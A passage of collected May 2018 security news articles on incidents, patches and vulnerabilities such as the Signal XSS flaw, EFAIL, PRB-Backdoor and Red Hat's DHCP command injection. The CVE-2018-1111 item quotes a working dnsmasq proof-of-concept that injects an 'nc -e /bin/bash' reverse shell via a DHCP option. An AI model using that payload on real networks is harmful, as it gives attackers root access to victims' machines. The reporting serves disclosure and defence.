“At this moment in time I have not yet been in contact with anyone. We are still clarifying some messages, since the attack was only resolved during the night,” he told Ritzau.

“Now the day has started we will naturally contact relevant bodies,” he added.

Aske Wieth-Knudsen from DSB confirmed that the company has not been paid any kind of ransom in connection with the cyber assault.


Hackers shared technical details of a Code Injection flaw in Signal App
16.5.2018 securityaffairs
Vulnerebility

Researchers shared details of a code injection vulnerability they found in the in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.
Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject a malicious code inside the Signal desktop app running on the recipients’ system without requiring any user interaction, just by sending the victims a specially crafted link.

The discovery of the flaw was casual, the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal messenger when one of them shared a link of an XSS vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.

Signal XSS flaw

“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”

Signal xss flaw 2
The researchers focused their attention on XSS flaws in the Signal Messaging App and conducted other tests discovering that the vulnerabilities was affecting the function responsible for handling shared links.

The experts discovered that it is possible to exploit the flaw to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.

“We tried different kinds of HTML elements: img, form, script, object, frame, framset, iframe, sound, video (this last two where funny).” continues the experts. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
send a crafted image in base64 format (we didn’t carry on with this)
send a file/phish and execute it with <iframe src=”…”></iframe>
have fun with <img>, <audio> and <video> 🙂”
The attackers can also exploit the vulnerability to inject a form on the recipient’s chat window, tricking them to provide sensitive information via social engineering attacks.
The experts applauded the Signal security team that on Friday in under 2 hours from the report has fixed the issue.

Experts explained that the flaw did not allow attackers to execute system commands or gain sensitive information like decryption keys on the recipients’ system.

After Signal fixed the issue, the researcher analyzed the file’s history and discovered the patch leverages a regex function to validate URLs.
The applied “patch” already existed in the application, but was probably accidentally removed in a commit on April 10th to fix an issue with linking.
The experts are concerned about that regex and they are afraid someone might exploit it.
The Signal app continues to be the most secure choice for encrypted communication.


Dutch Government plans to phase out the use of Kaspersky solutions
16.5.2018 securityaffairs BigBrothers

Dutch Government plans to phase out the use of Kaspersky solutions while the security firm confirmed that its code infrastructure is going to move to Switzerland.
The antivirus firm Kaspersky Lab made the headlines again, the company confirmed that its code infrastructure is going to move to Switzerland. The news arrives just after the comment from the Netherlands government of the risks associated with the usage of Kaspersky Lab software.

Dutch government announced on Monday it plans to phase out the use of anti-virus software developed by Kaspersky Labs “as a precautionary measure” and recommending companies involved in the protection of critical infrastructure to do the same.

Dutch Government fear the aggressive Russian cyber strategy cyber that targets among others the country interests.

“In a letter to parliament, Justice Minister Ferdinand Grapperhaus said the decision was made because the Russian government had an “offensive cyber programme that targets among others the Netherlands and Dutch interests”.” reported The New York Times.

“He also said Moscow-based Kaspersky was subject to Russian laws that could oblige it to comply with Russian state interests.”

In response to the accusations from several governments, Kaspersky is moving a number of its core activities from Russia to Switzerland as part of its “Global Transparency Initiative.” It has been estimated that the overall costs of the transfer are $12m.

“The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis,” Grapperhaus said. “Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Grapperhaus explained the Dutch government would consider revising the decision “if circumstances justify” doing so.


The U.S. DHS ban on the use of Kaspersky software by the U.S. Federal government in 2017, while Kaspersky continues to deny any cooperation with Russian intelligence,

Britain’s National Cyber Security Centre for agencies and organizations also suggests avoiding the usage of Kaspersky solutions for the protection of systems that manage classified information.

In December, Lithuania announced it will ban the products of the cybersecurity giant Kaspersky from computers in critical infrastructure.

In April, Twitter banned Kaspersky from advertising on its platform citing DHS ban for its alleged ties with Russian intelligence agencies.


Rail Europe North America hit by payment card data breach
16.5.2018 securityaffairs Incindent

Rail Europe North America (RENA) notifies customers of a security breach, crooks compromised its website with a malware used to siphon payment card data.
The website allows users to buy European train tickets, according to the company the data breach lasted at least three months (between November 29, 2017 and February 16, 2018), the incident exposed also customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV of customers, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known safe code, it also removed any potentially untrusted components. The IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”


Anonymous defaced Russia govt website against Telegram ban
16.5.2018 securityaffairs BigBrothers

Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.
Anonymous hacked the official website of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo), the cyber attack occurred on May 10th (Rossotrudnichestvo). The popular collective hacked and defaced the subdomain of the site to protest against the government censorship, with a specific reference to the ban on Telegram. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

“The website of a government agency tasked with promoting Russia’s image abroad has been hijacked by hackers who posted a message with a threat against the state body involved in a campaign to block a popular messaging app.” reads The Moscow Times.

Since May 3rd, 2018, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

Anonymous defaced one of the subdomains of Rossotrudnichestvo, the hackers published the NSFW image and several messages against the ongoing government censorship.

“Greetings, Roskomnadzor. Your recent destructive actions against Runet led us to the idea that you are just a handful of incompetent brainless worms. You no longer have to be able to continue this pointless vandalism. Consider this as our last warning. Yours, Anonymous.” reads the message published on the defaced domain.

Anonymous hack Russia Website
Source: Hackread.com

“That defacement was accompanied by the image of a cartoon character wearing a Roskomnadzor arm patch using a flamethrower on the “internet,” as well as a symbol of Telegram founder Pavel Durov’s “Digital Resistance” which he declared against political censorship.” continues the media outlet.

Currently, the Rossotrudnichestvo website is up and active, while the defaced subdomain prev.rs.gov.ru was offline.


Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
16.5.2018 securityaffairs
Vulnerebility

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.
Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux, the issue also affects other distros based on it like Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm
@_fel1x
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.

3:54 PM - May 15, 2018
450
474 people are talking about this
Twitter Ads info and privacy
“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client application receives network configuration parameters, including IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a PoC for the CVE-2018-1111, in the last screenshot the attacker accesses the shell as root.

Red Hat DHCP client flaw

Barkın Kılıç
@Barknkilic
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat

9:21 PM - May 15, 2018
824
661 people are talking about this
Twitter Ads info and privacy
Wilhelm did not release a PoC exploit code, but he explained that is so short in length that it even can fit in a tweet.

According to Wilhelm, an attacker using a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim’s system running vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7, admins should update their packages to the newer versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.

Below the full list of affected RHEL versions:

Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distros like OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementation doesn’t include NetworkManager integration script by default.


Mysterious hackers ingenuously reveal two Zero-Days to security community
16.5.2018 securityaffairs
Vulnerebility

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.
Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1, zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

The victim receives and opens a weaponized PDF file
Once the user opened the PDF, a malicious JavaScript code will execute.
JavaScript code manipulates a button object
The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
JavaScript code uses heap-spray techniques to obtain read and write memory access
JavaScript code then interacts with Adobe Reader’s JavaScript engine
The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
Shellcode initializes a PE file embedded in the PDF
Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.
Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”


Symantec Shares More Information on Internal Investigation
15.5.2018 securityweek  IT

Symantec shares gained nearly 10 percent on Monday in anticipation of a conference call that promised to provide more information regarding the internal investigation announced by the company last week.

Along with its financial results for the fourth quarter and full year, Symantec told investors last week that the Audit Committee of the Board of Directors had launched an investigation as a result of concerns raised by a former employee.

The company initially did not share any additional information, except that the Securities and Exchange Commission (SEC) had been notified and that the probe would likely prevent it from filing its annual 10-K report with the SEC in a timely manner.

Symantec shares dropped roughly 20 percent to less than $24 after the announcement was made on Thursday, and on Friday shares dove 33 percent, reaching just over $19.

A conference call announced for Monday afternoon helped the company gain nearly 10 percent, closing at $21.40.

While many expected Symantec to provide details on its internal probe, the company did not answer any questions on the matter. A statement published by the company does, however, reveal that the investigation is related to “concerns raised by a former employee regarding the Company’s public disclosures including commentary on historical financial results, its reporting of certain Non-GAAP measures including those that could impact executive compensation programs, certain forward-looking statements, stock trading plans and retaliation.”

The company says it cannot predict the duration of the investigation or the outcome, which could have an impact on financial results and guidance.

The cybersecurity firm says it does not anticipate a material adverse impact on its historical financial statements.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
14.5.2018 securityweek
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including critical flaws that allow arbitrary code execution.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.


Emails Encrypted With OpenPGP, S/MIME Vulnerable to New Attacks
14.5.2018 securityweek
Attack  

Researchers from three universities in Germany and Belgium say they have discovered attack methods that can be used by malicious actors to read emails encrypted with OpenPGP and S/MIME, but some believe the claims are overblown.

The team of researchers who discovered the attacks were initially planning on disclosing details on Tuesday morning, but they later decided to make their findings public sooner as a result of speculation and third parties leaking information.

OpenPGP is an encryption standard that is often used by individuals and organizations to protect emails and other types of communications against eavesdropping. S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard that is more commonly used to secure email in enterprise environments.

According to researchers, there are some vulnerabilities in OpenPGP and S/MIME that can be exploited to exfiltrate plain text from encrypted emails, including messages sent by the targeted user in the past.EFAIL attack on PGP and S/MIME

There are two variations of this attack, which experts have dubbed EFAIL. Both require the attacker to be able to intercept encrypted emails, either via man-in-the-middle (MitM) attacks, by hacking email accounts, or through compromised SMTP servers. The attacker then manipulates the ciphertext in the harvested emails and sends a modified message containing custom HTML code to the original receiver or sender.

The first method, which involves direct exfiltration, leverages vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. In this attack, the hacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client opens and decrypts the email, the attacker’s code causes the application to send the text to the attacker’s server.

The second method, named a CBC/CFB gadget attack, abuses vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) specifications. In both cases the victim needs to be in possession of their private key – the method cannot be used to recover encrypted messages if the private key has been lost.

“Once [the victim] opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

Experts say the direct exfiltration technique is efficient against both PGP and S/MIME, while the second method works against PGP with a success rate of one in three attempts. On the other hand, the CBC/CFB gadget attacks could become more efficient against PGP as well once more research is conducted.

The EFAIL attack is said to work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

Just as the researchers announced their intention to disclose the details of these vulnerabilities, the EFF published a blog post telling users to “immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email” and use alternatives, such as Signal, for secure communications.

However, some members of the industry believe the EFF’s alert and the researchers’ claims are overblown, noting that EFAIL attacks are actually possible due to how email clients implement PGP and they can be mitigated by not using HTML for incoming emails.

Cryptography expert Matthew Green believes EFAIL poses a bigger risk to enterprises that use S/MIME, describing the attack on this standard as “straightforward.”

Expert comments on EFAIL attack

Medium-term mitigations proposed by the researchers who discovered EFAIL involve patches released by email client developers, but they believe the mitigations implemented by each vendor “may or may not prevent the attacks.” As for long-term mitigations, they believe changes will need to be made to the OpenPGP and S/MIME standards themselves.


New PowerShell Backdoor Discovered
14.5.2018 securityweek
Virus

A recently detected PowerShell backdoor can steal information and execute various commands on the infected machines.

Dubbed PRB-Backdoor, the malware has been distributed via a Word document containing malicious macros. The document was named “Egyptairplus.doc” and was initially believed to deliver malware linked to the MuddyWater campaigns targeting the Middle East.

Analysis of the document’s macro revealed a function called Worker(), designed to call multiple other functions embedded in the document, to ultimately run a PowerShell command.

The command would look within the document for a chunk of embedded data that is Base64 encoded and decodes it, the security researcher behind Security 0wnage explains. This eventually results in an obfuscated PowerShell script.

“Replacing iex with Write-Output and running this code will result in a second layer PowerShell script that is shown earlier in the blog and has similarities with MuddyWater code due to the use of the Character Substitution functions,” the security researcher notes.

Replacing all the iex with Write-Output reveals more readable code that still contains encoded chunks of data. Further analysis of the code revealed an Invoker.ps1 script designed to decrypt the main backdoor code.

The backdoor contains over 2000 lines of code when properly formatted. Because of the main function is named PRB, the researcher decided to call the malware PRB-Backdoor.

Although execution of the sample in a sandbox did not reveal network communication, the code does include a variable that appears to point to the main domain that the backdoor communicates with to retrieve commands, namely outl00k[.]net.

The researcher discovered that the email address used to register the domain was also used for the domain LinLedin[.]net. The researcher also found the IPs the two domains were resolving to, but no additional information on either of them was discovered.

Looking into the PRB-Backdoor code, the security researcher found functions supposedly related to initial communication and registration with the command and control (C&C) server, along with a function designed to retrieve the browsing history from different browsers, including Chrome, Internet Explorer, and Firefox.

Other functions revealed the backdoor’s ability to steal passwords, write files to disk, read files, update itself, launch a shell, log keystrokes, take a screenshot of the screen, get the system info, and more.

“The PRB-Backdoor seems to be a very interesting piece of malware that is aimed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source,” the researcher notes.


Facebook Suspends 200 Apps Over Data Misuse
14.5.2018 securityweek
Social

Facebook said Monday it has suspended "around 200" apps on its platform as part of an investigation into misuse of private user data.

The investigation was launched after revelations that political consulting firm Cambridge Analytica hijacked data on some 87 million Facebook users as it worked on Donald Trump's 2016 campaign.

"The investigation process is in full swing," said an online statement from Facebook product partnerships vice president Ime Archibong.

"We have large teams of internal and external experts working hard to investigate these apps as quickly as possible. To date thousands of apps have been investigated and around 200 have been suspended -- pending a thorough investigation into whether they did in fact misuse any data."

Archibong added that "where we find evidence that these or other apps did misuse data, we will ban them and notify people via this website."

The revelations over Cambridge Analytica have prompted investigations on both sides of the Atlantic and led Facebook to tighten its policies on how personal data is shared and accessed.

Facebook made a policy change in 2014 limiting access to user data but noted that some applications still had data it had obtained prior to the revision.

"There is a lot more work to be done to find all the apps that may have misused people's Facebook data -- and it will take time," Archibong said.


Behind the Scenes in the Deceptive App Wars
14.5.2018 securityweek IT

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront with how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seem valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which the user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA, Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Security Gaps Remain as OT, IT Converge
14.5.2018 securityweek IT 

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not used privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

